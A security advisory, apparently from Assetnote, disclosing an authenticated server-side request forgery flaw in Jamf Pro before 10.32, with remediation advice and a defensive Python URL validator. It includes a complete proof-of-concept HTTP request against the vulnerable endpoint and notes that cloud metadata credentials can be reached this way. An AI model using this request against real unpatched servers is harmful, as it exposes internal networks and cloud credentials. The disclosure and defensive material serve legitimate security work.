Nov 30, 2021
Jamf Pro before version 10.32 is vulnerable to a server-side request forgery (SSRF) vulnerability that allows attackers to request arbitrary URLs and read the full HTTP response for those requests. This vulnerability is only exploitable after an attacker has authenticated to the Jamf Pro instance. On cloud environments such as AWS, this poses a greater risk, as an attacker can potentially obtain AWS credentials via the metadata IP address.
An attacker can request arbitrary URLs on behalf of the Jamf Pro server. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials. As Jamf Pro is often deployed on-premises within an internal network, this vulnerability exposes that internal network to authenticated Jamf Pro users.
Jamf Pro before version 10.32.
Jamf Pro is an application used by system administrators to configure and automate IT administration tasks for macOS, iOS, iPadOS, and tvOS devices. Jamf offers on-premises and cloud-based mobile device management.
This vulnerability was patched in Jamf 10.32.
Details of this Jamf release are available here: https://community.jamf.com/t5/jamf-pro/what-s-new-in-jamf-pro-10-32-release/m-p/246505.
To remediate this vulnerability, we recommend that on-premises deployments upgrade to the latest version of Jamf Pro.
http://yourjamfinstance:8090/eduFeatureSettingsTest.html
The following HTTP request can be made to reproduce this issue, once authenticated to Jamf:
POST /eduFeatureSettingsTest.ajax?id=0&o=r HTTP/1.1
Host: jamfpro:8080
Content-Length: 117
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://re.local:8090
Referer: http://re.local:8090/legacy/eduFeatureSettingsTest.html?id=0&o=r
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=NGQwZDlkODQtZmY4MS00NjI3LTk5MGUtODA1MDg0NmRhZmY4
Connection: close

imageUrl=http%3A%2F%2Fexample.com&ajaxAction=ACTION_AJAX_REQUEST_PHOTO&session-token=dQcHUw2h9CF1QvoG5Q6lqBLawNEsxPuu
The full HTTP response for the requested URL can be found in the base64Image XML tag of the response from the Jamf server:
HTTP/1.1 200
X-FRAME-OPTIONS: SAMEORIGIN
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
sessionExpiresEpoch: 1800
Date: Tue, 17 Aug 2021 13:09:14 GMT
Connection: close
Content-Length: 1959

<?xml version="1.0" encoding="UTF-8"?><jss>
<base64Image>[Base64-encoded response body omitted]</base64Image>
<ERRORS>
<ERROR>
<ERROR_FIELD>base64Image</ERROR_FIELD>
<ERROR_TEXT>The distribution point URL should begin with "https://"</ERROR_TEXT>
</ERROR>
</ERRORS>
<sessionExpiresEpoch>1800</sessionExpiresEpoch>
</jss>
Upon decoding the Base64, the full contents of the response from http://example.com is returned:
<!doctype html>
<html>
<head>
<title>Example Domain</title>
... omitted for brevity ...
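As an added illustration that is not Jamf's code, the following hypothetical validate_image_url shows the kind of pre-fetch check the error text above hints at: it rejects anything that is not https and any host that resolves to loopback, private or link-local space (which covers the 169.254.169.254 metadata address mentioned earlier) before any request is made. The resolve parameter is an assumption so the check can run without network access.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical validator, not Jamf's implementation. The Jamf response shown
# above reports the 'should begin with "https://"' error alongside the fetched
# data, i.e. after the request was already made; this check runs first.


def _resolve_all(host):
    """Default resolver: every address the host resolves to (all must pass)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def validate_image_url(url, resolve=_resolve_all):
    """Return (ok, reason) for a user-supplied distribution point URL."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() != "https":
        return False, 'scheme must be "https"'
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    host = parts.hostname  # brackets already stripped for IPv6 literals
    if not host:
        return False, "missing host"
    try:
        addrs = {ipaddress.ip_address(host)}  # literal IP: no lookup needed
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolve(host)}
        except (socket.gaierror, ValueError):
            return False, "host does not resolve"
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        # is_global is False for RFC 1918, loopback, link-local (including
        # 169.254.169.254), CGNAT and other reserved ranges.
        if not addr.is_global:
            return False, f"{host} resolves to non-global address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs; the stub resolver avoids real DNS lookups.
    stub = lambda h: {"8.8.8.8"}
    for u in ("http://example.com", "https://169.254.169.254/latest/meta-data/",
              "https://10.0.0.5/x", "https://cdn.example/photo.jpg"):
        print(u, "->", validate_image_url(u, resolve=stub))
```

The check must be applied again to every redirect target, and the fetch should connect to the address that was validated; otherwise an open redirect or DNS rebinding bypasses it.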
The blog post detailing the steps taken for the discovery of this vulnerability can be found here.
Assetnote Security Research Team